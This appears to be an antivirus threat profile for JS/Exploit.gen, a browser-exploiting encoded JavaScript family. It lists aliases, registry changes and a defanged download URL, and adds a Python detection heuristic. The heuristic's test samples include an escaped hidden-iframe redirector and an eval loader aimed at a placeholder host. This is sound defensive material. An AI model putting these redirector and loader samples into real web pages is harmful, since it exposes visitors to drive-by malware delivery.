Virus Profile: JS/Exploit.gen

Virus Profile information details
Risk Assessment: Home Low | Corporate Low
Date Discovered: 2/2/2009
Date Added: 2/2/2009
Origin: N/A
Length: varies
Type: Trojan
Subtype: Generic
DAT Required: 5514
Description

JS/Exploit.gen is a generic detection for suspiciously encoded JavaScript. Scripts containing certain attributes used to maliciously exploit a browser or other web content rendering mechanism are detected under this classification name.

JS/Exploit is not a virus, but rather an exploit that takes advantage of a security vulnerability in some versions of Microsoft Internet Explorer, Outlook and Outlook Express.

Indication of Infection

The presence of downloaded files resulting from the script's execution.

Exploitation modifies the browser's start page and search page, and adds unauthorized links to the "Favorites" folder of Microsoft Internet Explorer.

Typically this exploit is used to execute other programs. Those programs can be whatever the author chooses to run on the vulnerable system, so it is not possible to provide specific information: one attack can vary from the next.

Methods of Infection

Browsing an infected website containing this script.

This threat could be delivered via an email message or an infectious web page.

Virus Characteristics

------ Updated on June 4, 2012 ------

Aliases

  • Ikarus - JS.Redirector
  • Kaspersky - HEUR:Trojan.Script.Iframer
  • Avast - JS:Redirector-VI [Trj]
  • Microsoft - Trojan:JS/Kasura.A

JS/Exploit.gen is a generic detection for suspiciously encoded JavaScript: scripts containing certain attributes used to maliciously exploit the browser.

Upon execution, it opens Internet Explorer (Iexplorer.exe) and displays the pages shown below.

The following registry keys are added:

  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_STISVC\0000\Control
  • HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_STISVC\0000\Control
  • HKEY_USER\S-1-[varies]\Software\Microsoft\Windows\CurrentVersion\Applets\Paint
  • HKEY_USER\S-1-[varies]\Software\Microsoft\Windows\CurrentVersion\Applets\Paint\Colors
  • HKEY_USER\S-1-[varies]\Software\Microsoft\Windows\CurrentVersion\Applets\Paint\General-Bar0
  • HKEY_USER\S-1-[varies]\Software\Microsoft\Windows\CurrentVersion\Applets\Paint\General-Bar1
  • HKEY_USER\S-1-[varies]\Software\Microsoft\Windows\CurrentVersion\Applets\Paint\General-Bar2
  • HKEY_USER\S-1-[varies]\Software\Microsoft\Windows\CurrentVersion\Applets\Paint\General-Bar3
  • HKEY_USER\S-1-[varies]\Software\Microsoft\Windows\CurrentVersion\Applets\Paint\General-Bar4
  • HKEY_USER\S-1-[varies]\Software\Microsoft\Windows\CurrentVersion\Applets\Paint\General-Summary
  • HKEY_USER\S-1-[varies]\Software\Microsoft\Windows\CurrentVersion\Applets\Paint\Settings
  • HKEY_USER\S-1-[varies]\Software\Microsoft\Windows\CurrentVersion\Applets\Paint\Text
  • HKEY_USER\S-1-[varies]\Software\Microsoft\Windows\CurrentVersion\Applets\Paint\View
  • HKEY_USER\S-1-[varies]\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012012061120120612

The following registry values are added:

  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_STISVC\0000\Control\ActiveService: "stisvc"
  • HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_STISVC\0000\Control\ActiveService: "stisvc"
  • HKEY_USER\S-1-[varies]\Software\Microsoft\Windows\CurrentVersion\Applets\Paint\View\WindowPlacement: 2C 00 00 00 02 00 00 00 03 00 00 00 00 00 00 00 00 00 00 00 FF FF FF FF FF FF FF FF 00 00 00 00 00 00 00 00 13 01 00 00 9A 01 00 00
  • HKEY_USER\S-1-[varies]\Software\Microsoft\Windows\CurrentVersion\Applets\Paint\View\ShowThumbnail: 0x00000000
  • HKEY_USER\S-1-[varies]\Software\Microsoft\Windows\CurrentVersion\Applets\Paint\View\BMPWidth: 0x00000000
  • HKEY_USER\S-1-[varies]\Software\Microsoft\Windows\CurrentVersion\Applets\Paint\View\BMPHeight: 0x00000000
  • HKEY_USER\S-1-[varies]\Software\Microsoft\Windows\CurrentVersion\Applets\Paint\View\ThumbXPos: 0x00000000
  • HKEY_USER\S-1-[varies]\Software\Microsoft\Windows\CurrentVersion\Applets\Paint\View\ThumbYPos: 0x00000000
  • HKEY_USER\S-1-[varies]\Software\Microsoft\Windows\CurrentVersion\Applets\Paint\View\ThumbWidth: 0x00000000
  • HKEY_USER\S-1-[varies]\Software\Microsoft\Windows\CurrentVersion\Applets\Paint\View\ThumbHeight: 0x00000000
  • HKEY_USER\S-1-[varies]\Software\Microsoft\Windows\CurrentVersion\Applets\Paint\View\UnitSetting: 0x00000000
  • HKEY_USER\S-1-[varies]\Software\Microsoft\Windows\CurrentVersion\Applets\Paint\View\NoStretching: 0x00000000
  • HKEY_USER\S-1-[varies]\Software\Microsoft\Windows\CurrentVersion\Applets\Paint\View\SnapToGrid: 0x00000000
  • HKEY_USER\S-1-[varies]\Software\Microsoft\Windows\CurrentVersion\Applets\Paint\View\GridExtent: 0x00000001
  • HKEY_USER\S-1-[varies]\Software\Microsoft\Windows\CurrentVersion\Applets\Paint\Text\ShowTextTool: 0x00000001
  • HKEY_USER\S-1-[varies]\Software\Microsoft\Windows\CurrentVersion\Applets\Paint\Text\PointSize: 0x00000000
  • HKEY_USER\S-1-[varies]\Software\Microsoft\Windows\CurrentVersion\Applets\Paint\Text\PositionX: 0x00000000
  • HKEY_USER\S-1-[varies]\Software\Microsoft\Windows\CurrentVersion\Applets\Paint\Text\PositionY: 0x00000000
  • HKEY_USER\S-1-[varies]\Software\Microsoft\Windows\CurrentVersion\Applets\Paint\Text\Bold: 0x00000000
  • HKEY_USER\S-1-[varies]\Software\Microsoft\Windows\CurrentVersion\Applets\Paint\Text\Underline: 0x00000000
  • HKEY_USER\S-1-[varies]\Software\Microsoft\Windows\CurrentVersion\Applets\Paint\Text\Italic: 0x00000000
  • HKEY_USER\S-1-[varies]\Software\Microsoft\Windows\CurrentVersion\Applets\Paint\Text\VerticalEdit: 0xFFFFFFFF
  • HKEY_USER\S-1-[varies]\Software\Microsoft\Windows\CurrentVersion\Applets\Paint\Text\TextPen: 0x00000000
  • HKEY_USER\S-1-[varies]\Software\Microsoft\Windows\CurrentVersion\Applets\Paint\Text\TypeFaceName: ""
  • HKEY_USER\S-1-[varies]\Software\Microsoft\Windows\CurrentVersion\Applets\Paint\Text\CharSet: 0x00000000
  • HKEY_USER\S-1-[varies]\Software\Microsoft\Windows\CurrentVersion\Applets\Paint\General-Summary\Bars: 0x00000005
  • HKEY_USER\S-1-[varies]\Software\Microsoft\Windows\CurrentVersion\Applets\Paint\General-Summary\ScreenCX: 0x00000552
  • HKEY_USER\S-1-[varies]\Software\Microsoft\Windows\CurrentVersion\Applets\Paint\General-Summary\ScreenCY: 0x00000266
  • HKEY_USER\S-1-[varies]\Software\Microsoft\Windows\CurrentVersion\Applets\Paint\General-Bar4\BarID: 0x0000E818
  • HKEY_USER\S-1-[varies]\Software\Microsoft\Windows\CurrentVersion\Applets\Paint\General-Bar4\XPos: 0xFFFFFFFE
  • HKEY_USER\S-1-[varies]\Software\Microsoft\Windows\CurrentVersion\Applets\Paint\General-Bar4\YPos: 0xFFFFFFFE
  • HKEY_USER\S-1-[varies]\Software\Microsoft\Windows\CurrentVersion\Applets\Paint\General-Bar4\Docking: 0x00000001

The following registry values on the system are modified:

  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\ServiceCurrent\: 0x00000009
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\ServiceCurrent\: 0x0000000A
  • HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ServiceCurrent\: 0x00000009
  • HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ServiceCurrent\: 0x0000000A
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\Directory = "%windir%\system32\config\systemprofile\Local Settings\Temporary Internet Files\Content.IE5"
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\Directory = "%userprofile%\Local Settings\Temporary Internet Files\Content.IE5"
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1\CachePath: "%windir%\system32\config\systemprofile\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1\CachePath: "%userprofile%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2\CachePath: "%windir%\system32\config\systemprofile\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2\CachePath: "%userprofile%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3\CachePath: "%windir%\system32\config\systemprofile\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3\CachePath: "%userprofile%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4\CachePath: "%windir%\system32\config\systemprofile\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4\CachePath: "%userprofile%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
  • HKEY_USER\S-1-[varies]\Software\Microsoft\Internet Explorer\Main\Window_Placement: 2C 00 00 00 02 00 00 00 03 00 00 00 00 83 FF FF 00 83 FF FF FF FF FF FF FF FF FF FF 16 00 00 00 1D 00 00 00 6E 02 00 00 B1 01 00 00
  • HKEY_USER\S-1-5-[varies]\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings: 3C 00 00 00 1B 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 80 7E 39 29 A0 31 C6 01 01 00 00 00 C0 A8 C7 96 00 00 00 00 00 00 00 00

------ Updated on Dec-06-2011 ------

Aliases

  • Norman - HTML/Redir.JG
  • Sophos - Troj/PhpShl-G
  • Symantec - Trojan.Webkit!html

"Js/Exploit.gen" is a generic detection for HTML files containing malicious code that redirects users to malicious Web servers.

The "Js/Exploit.gen" sample also contains encrypted JavaScript code that uses a vulnerability in some versions of Microsoft Internet Explorer to execute. Once the vulnerability is exploited, binary files are downloaded from the following malicious URL:

hxxp://sukablya[removed].com/main.php?page=43842ba0d45a9da3

-----

This is a generic detection. Specific payloads, URLs, or IP addresses may vary between samples.

Js/Exploit.gen contains encrypted JavaScript code that uses a vulnerability in some versions of Microsoft Internet Explorer to execute. Once the vulnerability is exploited, binary files are downloaded from the malicious URL, saved in the temporary folder (%temp%), and finally executed.
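The two descriptions above (the June 2012 "suspiciously encoded JavaScript" note and the Dec 2011 "HTML containing code to redirect users" note) describe the same class of page from a scanner's point of view. The script below is an added example, not McAfee's detection logic or signature content: it peels percent/hex escape layers off a script, matches each decoded layer against a small set of indicators (eval/unescape/document.write, zero-size iframes, long runs of escapes), adds an entropy check on the raw input, and returns a score. The indicator list, weights, thresholds and the sample inputs (including the reserved host name example.invalid) are all assumptions constructed for this example.

```python
"""Heuristic triage for suspiciously encoded JavaScript / redirecting HTML.

Added example: the indicators, weights and thresholds below are assumptions
chosen for illustration, not the vendor's detection logic.
"""
import math
import re
from collections import Counter
from urllib.parse import quote

# Indicator patterns and weights (constructed for this example).
INDICATORS = {
    "eval": (re.compile(r"\beval\s*\(", re.I), 2),
    "unescape": (re.compile(r"\bunescape\s*\(", re.I), 2),
    "fromCharCode": (re.compile(r"String\.fromCharCode", re.I), 2),
    "document_write": (re.compile(r"document\.write\s*\(", re.I), 1),
    # an iframe with width or height 0 is invisible to the user: classic redirector
    "hidden_iframe": (re.compile(r"<iframe[^>]*\b(?:width|height)\s*=\s*[\"']?0\b", re.I), 3),
    # 40+ consecutive %XX, \xXX or \uXXXX escapes: content hidden from plain reading
    "long_escaped_string": (re.compile(r"(?:%[0-9a-f]{2}|\\x[0-9a-f]{2}|\\u[0-9a-f]{4}){40,}", re.I), 3),
}

_ESCAPE_RE = re.compile(r"%([0-9a-fA-F]{2})|\\x([0-9a-fA-F]{2})|\\u([0-9a-fA-F]{4})")


def shannon_entropy(text):
    """Bits per character; random-looking encoded payloads score high."""
    if not text:
        return 0.0
    counts = Counter(text)
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def _decode_once(text):
    # Replace every %XX, \xXX or \uXXXX escape with the character it encodes.
    return _ESCAPE_RE.sub(lambda m: chr(int(m.group(1) or m.group(2) or m.group(3), 16)), text)


def decode_layers(text, max_depth=5):
    """Return [raw, decoded once, decoded twice, ...] until decoding changes nothing."""
    layers = [text]
    for _ in range(max_depth):
        decoded = _decode_once(layers[-1])
        if decoded == layers[-1]:
            break
        layers.append(decoded)
    return layers


def score_script(text):
    """Match every indicator against every decoded layer; return (hits, total score)."""
    hits = {}
    for layer in decode_layers(text):
        for name, (pattern, weight) in INDICATORS.items():
            if name not in hits and pattern.search(layer):
                hits[name] = weight
    # Entropy is measured on the raw input only: that is where the encoding lives.
    if len(text) > 200 and shannon_entropy(text) > 5.5:
        hits["high_entropy"] = 2
    return hits, sum(hits.values())


def is_suspicious(text, threshold=4):
    """Constructed threshold: two strong indicators, or one strong plus weaker ones."""
    return score_script(text)[1] >= threshold


# Constructed samples (example.invalid is a reserved, non-resolving name).
SAMPLE_BENIGN = '<script>document.getElementById("greeting").textContent = "Hello";</script>'

# A zero-size iframe hidden behind one layer of percent-encoding.
_IFRAME = '<iframe src="http://example.invalid/x.html" width=0 height=0></iframe>'
SAMPLE_HIDDEN_IFRAME = 'document.write(unescape("%s"))' % quote(_IFRAME, safe="")

# A loader where every single character is escaped, then fed to eval().
_LOADER = ('var a=document.createElement("iframe");a.width=0;a.height=0;'
           'a.src="http://example.invalid/main.php";document.body.appendChild(a);')
SAMPLE_FULLY_ESCAPED = 'eval(unescape("%s"))' % "".join("%%%02X" % ord(c) for c in _LOADER)

if __name__ == "__main__":
    for label, sample in [("benign", SAMPLE_BENIGN),
                          ("hidden iframe", SAMPLE_HIDDEN_IFRAME),
                          ("fully escaped", SAMPLE_FULLY_ESCAPED)]:
        hits, total = score_script(sample)
        print("%-14s score=%d suspicious=%s hits=%s"
              % (label, total, is_suspicious(sample), sorted(hits)))
```

Decoding every layer before matching is the point: the hidden iframe in the second sample is only visible after unescaping, and the fully escaped loader trips the raw-layer escape-run indicator even before its decoded content is inspected. Any real deployment would tune the weights against a corpus of benign pages, since `document.write` and `unescape` on their own are common in legitimate legacy code.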

   
Removal Instructions

All Users:
Use current engine and DAT files for detection. Delete any file which contains this detection.